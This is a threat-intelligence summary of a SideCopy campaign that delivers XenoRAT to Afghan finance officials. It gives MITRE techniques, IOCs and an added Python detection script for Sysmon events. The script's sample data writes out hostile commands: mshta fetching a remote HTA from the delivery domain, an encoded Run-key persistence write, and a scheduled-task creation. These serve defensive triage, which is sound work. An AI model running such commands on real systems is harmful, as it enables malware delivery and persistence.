Operation XENOFISCAL: SideCopy deploying persistent XenoRAT targeting the MoF, Afghanistan

Seqrite Labs analyzed a SideCopy-linked spear phishing campaign targeting Afghanistan’s Ministry of Finance and provincial Mustoufiats, using a Pashto-named LNK file to deliver a multi-stage loader chain that ends in XenoRAT. The operation abused compromised Afghan infrastructure for delivery and bulletproof European hosting for C2, reinforcing attribution to SideCopy and the codename “Operation XENOFISCAL.” #SideCopy #TransparentTribe #APT36 #XenoRAT #MinistryofFinance #Afghanistan

Keypoints

  • Seqrite Labs linked the campaign to the SideCopy cluster with medium-to-high confidence based on overlapping TTPs and infrastructure patterns.
  • The attack targeted Afghanistan’s Ministry of Finance, provincial finance directorates, and Pashto-speaking government officials.
  • Initial delivery used a ZIP archive containing a malicious LNK file with a Pashto filename crafted to resemble an internal government document.
  • The infection chain used mshta.exe, obfuscated JavaScript/HTA stages, registry persistence, and staged DLL loading to deploy the final payload.
  • The final payload was XenoRAT, which connected to hardcoded C2 infrastructure at 185.235.137.106 and used a mutex named clouda.
  • The decoy document was a provincial finance staff directory for all 34 Afghan provinces, suggesting prior intelligence gathering by the operator.
  • Infrastructure analysis showed the delivery domain was hosted on Afghan government-related IP space, while the RAT C2 was on HZ Hosting in Bulgaria/Frankfurt.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The campaign began with a ZIP archive delivered through phishing, containing the malicious LNK attachment (‘a ZIP archive containing a malicious LNK file’).
  • [T1218.005] System Binary Proxy Execution: Mshta – The LNK launched mshta.exe to fetch and run remote HTA content (‘it launches the Windows utility mshta.exe’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The malware used cmd.exe to execute commands, start payloads, and register persistence (‘runs cmd.exe /c start … and executes the specified file or command’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA stage contained heavily obfuscated JavaScript used to decode and execute malicious logic (‘heavily obfuscated JavaScript code designed to execute malicious logic’).
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence was created through HKCU Run keys, including an entry named Edgre (‘creates a new entry under the HKCU…Run registry key’).
  • [T1053.005] Scheduled Task – The malware also created a scheduled task named XenoUpdateManager for admin-level startup persistence (‘creates a Windows Scheduled Task named “XenoUpdateManager”’).
  • [T1027] Obfuscated Files or Information – Multiple stages used obfuscation, encoded strings, and hidden commands to hinder analysis (‘heavily obfuscated JavaScript’, ‘Base64-encoded registry commands’).
  • [T1140] Deobfuscate/Decode Files or Information – The loader decoded Base64 content, decompressed payloads, and reconstructed executables in memory (‘custom Base64 decoding routine’, ‘GZip decompression’).
  • [T1106] Native API – The shellcode loader used Windows APIs such as VirtualAlloc, CreateThread, and WaitForSingleObject (‘allocates executable memory’, ‘transfers execution’).
  • [T1027.009] Embedded Payloads and [T1620] Reflective Code Loading – The payload was reconstructed and executed from memory via .NET deserialization and in-memory assembly loading (‘BinaryFormatter.Deserialize_2()’, ‘Assembly.Load(byte[])’).
  • [T1129] Shared Modules – The infection chain loaded and invoked external DLL modules dynamically from memory (‘loads it dynamically using Assembly.Load’).
  • [T1070.004] File Deletion – The uninstaller removed itself from disk after cleanup (‘Del’, ‘self-terminates the program’).
  • [T1012] Query Registry – The malware queried registry paths to detect .NET versions and manage startup entries (‘querying the registry path HKLM\SOFTWARE\Microsoft\.NETFramework…’).
  • [T1518] Software Discovery – The malware checked for installed antivirus products via WMI (‘GetAntivirus function retrieves antivirus information’).
  • [T1095] Non-Application Layer Protocol – XenoRAT used TCP-based C2 communication (‘establishing a TCP-based command-and-control connection’).
  • [T1071.001] Application Layer Protocol: Web Protocols – The loader fetched payloads over HTTPS from web resources (‘downloaded the encoded payload from hxxps://abimj.edu.af/…’).
  • [T1090.002] Proxy: External Proxy – The RAT used SOCKS5 proxy-based tunneling (‘Supports SOCKS5 proxy-based network tunneling’).
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – C2 traffic was encrypted with AES under a shared key (‘data security is enforced using AES encryption’).
  • [T1568] Dynamic Resolution – The loader picked its download endpoint according to the victim’s OS version (‘dynamically selects the download endpoint based on the victim operating system version’). Note that this is conditional selection among fixed endpoints rather than the algorithmic domain generation or fast flux that T1568 usually denotes.

Indicators of Compromise

  • [SHA256] Malicious archive and stage files – 194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14, 3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01, and 7 more hashes
  • [File names] Delivered and reconstructed payloads – ugayt.hta, zuidrt.hta, and other payload filenames such as noway.bat, WayBroad.dll, Aotestpass.dll
  • [Domains / URLs] Delivery and staging infrastructure – abimj.edu.af, hxxp://abimj.edu.af/institute/cloudiyaf/document.pdf, and hxxps://abimj.edu.af/institute/10/
  • [IP addresses] RAT C2 and delivery hosting – 185.235.137.106, 103.132.98.224, and 103.132.98.226
  • [Network blocks / ASNs] Hosting infrastructure context – 103.132.98.0/23, AS58469, and AS59711
  • [Registry keys] Persistence location and .NET version check – HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319
  • [Mutex] Single-instance control – clouda
  • [Scheduled task name] Admin persistence – XenoUpdateManager
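The following Python is an added triage example, not Seqrite's code and not taken from the report: it runs the behavioural techniques and IOC values listed above over constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records. The IPs, network block, Run value name Edgre, task name XenoUpdateManager and delivery domain are the page's own; the event field names, the sample command lines (including the live https scheme in place of the page's defanged hxxps), the PowerShell -enc wrapping of the Run-key write and the path C:\Users\Public\payload.exe are assumptions made for the sample.

```python
"""Triage constructed Sysmon-style events against the XENOFISCAL TTPs and IOCs.
Added example, not Seqrite's code; field names are Sysmon-like assumptions."""
import base64
import ipaddress
import re

# IOC values taken from the page.
C2_IPS = {"185.235.137.106", "103.132.98.224", "103.132.98.226"}
DELIVERY_NET = ipaddress.ip_network("103.132.98.0/23")
RUN_VALUE_NAME = "Edgre"
TASK_NAME = "XenoUpdateManager"
DELIVERY_DOMAIN = "abimj.edu.af"
URL_RE = re.compile(r"https?://", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def _b64_contains(blob, needle):
    """True if a long Base64 run in blob decodes (UTF-16LE or UTF-8) to text containing needle;
    needed because the page notes Base64-encoded registry commands."""
    for m in B64_RE.finditer(blob):
        token = m.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4))
        except ValueError:
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                if needle.lower() in raw.decode(enc).lower():
                    return True
            except UnicodeDecodeError:
                continue
    return False

def check_process(ev):
    """Technique and IOC hits for one process-creation event (EventID 1)."""
    image, parent = ev.get("Image", "").lower(), ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()
    hits = []
    # T1218.005: mshta.exe fetching remote content; explorer.exe as parent is
    # what a double-clicked LNK looks like (the T1566.001 lure).
    if image.endswith("mshta.exe") and URL_RE.search(cmd):
        hits.append("T1218.005 mshta remote content")
        if parent.endswith("explorer.exe"):
            hits.append("T1566.001 likely LNK launch")
    # T1547.001: Run-key write, in the clear or hidden inside Base64.
    if "currentversion\\run" in low or _b64_contains(cmd, "CurrentVersion\\Run"):
        hits.append("T1547.001 Run key persistence")
    if RUN_VALUE_NAME.lower() in low or _b64_contains(cmd, RUN_VALUE_NAME):
        hits.append("IOC Run value " + RUN_VALUE_NAME)
    # T1053.005: the XenoRAT scheduled task name.
    if image.endswith("schtasks.exe") and "/create" in low and TASK_NAME.lower() in low:
        hits.append("T1053.005 task " + TASK_NAME)
    if DELIVERY_DOMAIN in low:
        hits.append("IOC domain " + DELIVERY_DOMAIN)
    return hits

def check_network(ev):
    """IOC hits for one network-connection event (EventID 3)."""
    dst = ev.get("DestinationIp", "")
    try:
        addr = ipaddress.ip_address(dst)
    except ValueError:
        return []
    if dst in C2_IPS:
        return ["IOC C2/delivery IP " + dst]
    if addr in DELIVERY_NET:
        return ["IOC delivery block " + str(DELIVERY_NET)]
    return []

def hunt(events):
    """Map RecordId -> hits for every event that fired at least one check."""
    checkers = {1: check_process, 3: check_network}
    findings = {}
    for ev in events:
        hits = checkers.get(ev.get("EventID"), lambda _ev: [])(ev)
        if hits:
            findings[ev["RecordId"]] = hits
    return findings

# Constructed sample telemetry (not from the report). The PowerShell -enc
# wrapping of the Run-key write and the payload path are assumptions.
_RUN_CMD = ("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
            "/v Edgre /t REG_SZ /d C:\\Users\\Public\\payload.exe /f")
_ENC = base64.b64encode(_RUN_CMD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"RecordId": 2, "EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta.exe https://abimj.edu.af/institute/10/"},
    {"RecordId": 3, "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + _ENC},
    {"RecordId": 4, "EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "schtasks /Create /SC ONLOGON /RL HIGHEST /TN XenoUpdateManager "
                    "/TR C:\\Users\\Public\\payload.exe"},
    {"RecordId": 5, "EventID": 3, "Image": "C:\\Users\\Public\\payload.exe",
     "DestinationIp": "185.235.137.106"},
    {"RecordId": 6, "EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationIp": "203.0.113.10"},
]

if __name__ == "__main__":
    for rid, hits in sorted(hunt(SAMPLE_EVENTS).items()):
        print(rid, hits)
```

Running the module flags records 2 to 5 and leaves the benign browser connection alone; the Base64 decoding step is what catches the Run-key write in record 3, which a plain string match on the command line would miss. The mutex clouda and the in-memory .NET stages are not visible in this kind of telemetry and need host-side tooling (handle enumeration, memory scanning) rather than log matching.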


Read more: https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/